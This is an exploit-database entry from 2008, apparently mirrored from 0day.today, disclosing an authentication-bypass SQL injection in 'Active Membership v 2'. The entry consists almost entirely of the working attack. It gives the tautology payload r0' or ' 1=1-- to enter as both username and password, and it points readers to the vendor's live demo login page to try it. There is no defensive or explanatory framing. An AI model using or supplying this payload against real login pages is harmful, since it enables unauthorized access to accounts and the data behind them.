id: 4300
date: 11/29/2008
title: Active Membership v 2 (Auth Bypass) Remote SQL Injection Vulnerability
author: R3d-D3v!L
cves: 

======================================================================
Active Membership v 2 (Auth Bypass) Remote SQL Injection Vulnerability
======================================================================


[~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
   
 [~]Vendor: www.activewebsoftwares.com
   
 [~]Software: Active Membership v 2
   
 [~] Date: 28.11.2008
   
 [~] Home: www.ahacker.biz
   
 [~] contact: N/A

[~] -----------------------------------------------------------
   
   
 [~] Exploit:
   
  username: r0' or ' 1=1--
  password: r0' or ' 1=1--
   
   
 [~]login 4 d3m0:
   
  http://www.activewebsoftwares.com/demoactivemembership/account.asp
 
 [~]--------------------------------------------------------------------------------



#  0day.today [2023-03-24]  #